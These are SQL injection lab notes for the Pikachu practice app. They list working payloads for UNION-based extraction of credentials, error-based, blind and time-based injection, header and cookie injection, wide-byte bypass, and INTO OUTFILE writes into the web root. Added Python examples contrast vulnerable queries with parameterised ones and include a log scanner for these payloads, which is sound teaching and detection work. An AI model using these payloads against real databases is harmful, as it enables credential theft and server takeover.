Numeric-type test:

$id=$_POST['id']

select column1,column2 from table_name where id = 1 or 1=1;

String-type test:

$uname=$_GET['username']

select column1,column2 from table_name where username='kobe' or 1=1#';

Search-type test:

like '%%'

xxxx%' or 1=1 #

xx-type test (the value is wrapped in quotes and parentheses):

=('')

xx') or 1=1 #
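All four shapes above share one root cause: the request parameter is pasted into the SQL text. The following Python/SQLite script is an added example, not code from these notes or from Pikachu. It builds each of the four queries twice, once by concatenation and once with bound parameters, against a constructed three-row `member` table, and runs the page's payloads through both. The table contents, the function names and the `run_demo` helper are my own; because SQLite's comment token is `--` rather than MySQL's `#`, the trailing `#` of the payloads is written as `-- ` here.

```python
import sqlite3

# Constructed sample table modelled on the `member` table in the notes (not Pikachu's real schema).
SAMPLE_ROWS = [
    (1, "kobe", "kobe@example.com"),
    (2, "lucy", "lucy@example.com"),
    (3, "admin", "admin@example.com"),
]


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("create table member (id integer primary key, username text, email text)")
    con.executemany("insert into member values (?, ?, ?)", SAMPLE_ROWS)
    return con


def vulnerable_lookup(con, kind: str, value: str) -> list:
    """The four query shapes from the notes, built by string concatenation (the bug)."""
    templates = {
        "numeric": "select id,email from member where id = {v}",
        "string":  "select id,email from member where username='{v}'",
        "search":  "select id,email from member where username like '%{v}%'",
        "xx":      "select id,email from member where username=('{v}')",
    }
    return con.execute(templates[kind].format(v=value)).fetchall()


def safe_lookup(con, kind: str, value: str) -> list:
    """The same four lookups with bound parameters: the value is data, never SQL."""
    if kind == "numeric":
        if not value.isdigit():          # reject "1 or 1=1" before it reaches the database
            raise ValueError("id must be an integer")
        return con.execute("select id,email from member where id = ?", (int(value),)).fetchall()
    if kind == "string":
        return con.execute("select id,email from member where username = ?", (value,)).fetchall()
    if kind == "search":
        # % and _ are LIKE wildcards; escape them so user input cannot widen the match
        pattern = "%" + value.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_") + "%"
        return con.execute(
            "select id,email from member where username like ? escape '\\'", (pattern,)
        ).fetchall()
    if kind == "xx":
        return con.execute("select id,email from member where username = (?)", (value,)).fetchall()
    raise ValueError(kind)


# SQLite comments start with --, so the notes' trailing # is written as "-- " here.
PAYLOADS = {
    "numeric": "1 or 1=1",
    "string":  "kobe' or 1=1 -- ",
    "search":  "xxxx%' or 1=1 -- ",
    "xx":      "xx') or 1=1 -- ",
}


def run_demo() -> dict:
    """Rows returned for each payload: (vulnerable query, parameterised query)."""
    con = make_db()
    result = {}
    for kind, payload in PAYLOADS.items():
        leaked = len(vulnerable_lookup(con, kind, payload))
        try:
            safe = len(safe_lookup(con, kind, payload))
        except ValueError:
            safe = "rejected"
        result[kind] = (leaked, safe)
    return result


if __name__ == "__main__":
    for kind, (leaked, safe) in run_demo().items():
        print(f"{kind:8s} vulnerable={leaked} rows  parameterised={safe}")
```

Each concatenated query hands back the whole table; the parameterised versions return nothing for the same input, and the numeric one refuses it outright. The `escape` clause in the search case matters because a bound parameter stops structural injection but does not stop `%` or `_` from acting as wildcards.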

#Getting table names:

select id,email from member where username = 'kobe' union select table_schema,table_name from information_schema.tables where table_schema='pikachu';

test payload:

kobe' union select table_schema,table_name from information_schema.tables where table_schema='pikachu'#

#Getting column names:

select id,email from member where username = 'kobe' union select table_name,column_name from information_schema.columns where table_name='users';

test payload:

kobe' union select table_name,column_name from information_schema.columns where table_name='users'#

#Getting the data:

select id,email from member where username = 'kobe' union select username,password from users;

test payload:

kobe' union select username,password from users#

#Error-based: updatexml()

kobe' and updatexml(1,version(),0)#

0x7e is '~': a leading ~ makes the XPath argument invalid, so the error message echoes the value concatenated after it.

kobe' and updatexml(1,concat(0x7e,version()),0)#

kobe' and updatexml(1,concat(0x7e,database()),0)#

#The error shows only one row at a time

kobe' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu')),0)#

Use limit to fetch the table names one at a time:

kobe' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1)),0)#

After getting the table name, get the column names; the approach is the same:

kobe' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1)),0)#

After getting the column names, get the data:

kobe' and updatexml(1,concat(0x7e,(select username from users limit 0,1)),0)#

kobe' and updatexml(1,concat(0x7e,(select password from users where username='admin' limit 0,1)),0)#

Error-based under insert/update:

xiaohong' or updatexml(1,concat(0x7e,database()),0) or '

Error-based under delete:

1 or updatexml(1,concat(0x7e,database()),0)

Based on extractvalue()

kobe' and extractvalue(0,concat(0x7e,version()))#

Based on floor()

kobe' and (select 2 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#

kobe' and (select 2 from (select count(*),concat((select password from users where username='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

Based on HTTP headers:

Cookie: ant[uname]=admin' and updatexml(1,concat(0x7e,database()),0)#

firefox' or updatexml(1,concat(0x7e,database()),0) or '

Boolean-based blind:

kobe' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>112#

(select table_name from information_schema.tables where table_schema=database() limit 0,1)

Time-based delay:

kobe' and if((substr(database(),1,1))='a',sleep(5),null)#

Wide-byte injection:

1%df' or 1=1#
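Why the %df byte matters, as an added example (my own code, not from the notes or from Pikachu): the script below models byte-level escaping of the kind PHP's addslashes() does and shows that, when the escaped bytes are decoded as GBK, 0xDF and the inserted 0x5C fuse into one two-byte character and the quote comes out unescaped, whereas the same bytes decoded as UTF-8 stay escaped. The `addslashes`, `has_unescaped_quote` and `escape_text` helpers are hypothetical models written for this example; `escape_text` stands in for charset-aware escaping (escaping decoded characters rather than raw bytes), and bound parameters remain the robust fix.

```python
# Characters that addslashes()-style escaping prefixes with a backslash: ' " \ NUL
ESCAPED = {0x27, 0x22, 0x5C, 0x00}


def addslashes(data: bytes) -> bytes:
    """Byte-oriented escaping: insert 0x5C before each special byte, ignoring the charset."""
    out = bytearray()
    for b in data:
        if b in ESCAPED:
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def has_unescaped_quote(text: str) -> bool:
    """True if some single quote is not protected by a preceding backslash."""
    i = 0
    while i < len(text):
        if text[i] == "\\":
            i += 2            # a backslash escapes whatever character follows it
            continue
        if text[i] == "'":
            return True
        i += 1
    return False


def quote_leaks_after_byte_escaping(raw: bytes, charset: str) -> bool:
    """Escape the raw bytes first, then decode them the way the database server will."""
    decoded = addslashes(raw).decode(charset, errors="replace")
    return has_unescaped_quote(decoded)


def escape_text(text: str) -> str:
    """Charset-aware escaping: operate on decoded characters, so a lead byte cannot swallow the backslash."""
    return text.replace("\\", "\\\\").replace("'", "\\'")


def quote_leaks_after_text_escaping(raw: bytes, charset: str) -> bool:
    """Decode first, then escape; the quote is always preceded by a real backslash character."""
    decoded = raw.decode(charset, errors="replace")
    return has_unescaped_quote(escape_text(decoded))


if __name__ == "__main__":
    payload = b"\xdf'"        # the %df' from the notes after URL decoding (constructed input)
    print(addslashes(payload))
    print(addslashes(payload).decode("gbk"))                    # 0xDF 0x5C became one character; the quote stands alone
    print(quote_leaks_after_byte_escaping(payload, "gbk"))      # True
    print(quote_leaks_after_byte_escaping(payload, "utf-8"))    # False
    print(quote_leaks_after_text_escaping(payload, "gbk"))      # False
```

The escaping function did its job at the byte level; the mismatch between the charset the escaper assumed and the charset the connection uses is what frees the quote. Setting the connection charset so the escaper and the server agree removes the mismatch, and bound parameters avoid escaping altogether.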

Obtaining OS privileges:

kobe' union select "",2 into outfile "/var/www/html/3.php"#

kobe' union select "",2 into outfile "/var/www/html/2.php"#

Brute-forcing table and column names:

kobe' and exists(select * from aa)#

kobe' and exists(select id from users)#
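Every payload family in these notes (union with information_schema, updatexml/extractvalue/floor, sleep, into outfile, exists(select ...) probes, the %df wide byte) leaves recognisable tokens in the query string. As an added detection example that is not part of the original notes, here is a small scanner that URL-decodes the request target of constructed access-log lines and flags those tokens; the log lines, the /search.php path and the rule names are made up for the demonstration. It only sees GET parameters, so POST bodies and headers such as Cookie or User-Agent have to be logged separately to catch the header-based cases above.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed access-log lines (Apache combined style); the payloads are the notes' own, URL-encoded.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jan/2024:10:00:01 +0000] "GET /search.php?name=kobe HTTP/1.1" 200 1523',
    '10.0.0.5 - - [10/Jan/2024:10:00:07 +0000] "GET /search.php?name=kobe%27+union+select+table_schema%2Ctable_name+from+information_schema.tables+where+table_schema%3D%27pikachu%27%23 HTTP/1.1" 200 2210',
    '10.0.0.5 - - [10/Jan/2024:10:00:12 +0000] "GET /search.php?name=kobe%27+and+updatexml%281%2Cconcat%280x7e%2Cdatabase%28%29%29%2C0%29%23 HTTP/1.1" 500 412',
    '10.0.0.5 - - [10/Jan/2024:10:00:20 +0000] "GET /search.php?name=kobe%27+and+if%28%28substr%28database%28%29%2C1%2C1%29%29%3D%27a%27%2Csleep%285%29%2Cnull%29%23 HTTP/1.1" 200 1523',
    '10.0.0.5 - - [10/Jan/2024:10:00:31 +0000] "GET /search.php?id=1%df%27+or+1%3D1%23 HTTP/1.1" 200 4102',
    '10.0.0.9 - - [10/Jan/2024:10:01:02 +0000] "GET /search.php?name=o%27brien HTTP/1.1" 200 1490',
    '10.0.0.9 - - [10/Jan/2024:10:01:05 +0000] "POST /login.php HTTP/1.1" 302 0',
]

# One rule per payload family from the notes; all run against the decoded, lower-cased query string.
RULES = {
    "union_select":       re.compile(r"union\s+(?:all\s+)?select"),
    "information_schema": re.compile(r"information_schema\."),
    "error_based":        re.compile(r"\b(?:updatexml|extractvalue)\s*\("),
    "floor_rand":         re.compile(r"floor\s*\(\s*rand\s*\("),
    "time_based":         re.compile(r"\bsleep\s*\("),
    "into_outfile":       re.compile(r"into\s+(?:out|dump)file"),
    "table_probe":        re.compile(r"exists\s*\(\s*select"),
    "tautology":          re.compile(r"\bor\s+1\s*=\s*1\b"),
    "wide_byte":          re.compile(r"[\x81-\xfe]'"),   # a GBK lead byte directly before a quote
}

REQUEST_LINE = re.compile(r'"[A-Z]+ (?P<target>[^ "]+)')


def normalize(query: str) -> str:
    """Form-decode the query string: '+' is a space, %XX is one byte, and each byte is kept as
    one character (latin-1) so a lone 0xDF lead byte stays visible instead of being replaced."""
    return unquote_to_bytes(query.replace("+", " ")).decode("latin-1").lower()


def scan_line(line: str) -> list:
    """Names of the rules that match the decoded query string of one log line."""
    m = REQUEST_LINE.search(line)
    if not m or "?" not in m.group("target"):
        return []
    query = normalize(m.group("target").split("?", 1)[1])
    return [name for name, rx in RULES.items() if rx.search(query)]


def scan(lines) -> dict:
    """Map 1-based line number -> matched rule names, for lines with at least one hit."""
    hits = {}
    for n, line in enumerate(lines, 1):
        matched = scan_line(line)
        if matched:
            hits[n] = matched
    return hits


if __name__ == "__main__":
    for n, rules in scan(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(rules)}")
```

Decoding before matching is what makes this work: the encoded request line contains neither a quote nor a space, so rules applied to the raw line would miss everything. The plain apostrophe in "o'brien" matches no rule, which is the false-positive case any such scanner has to tolerate; the rules fire on SQL syntax, not on the quote itself.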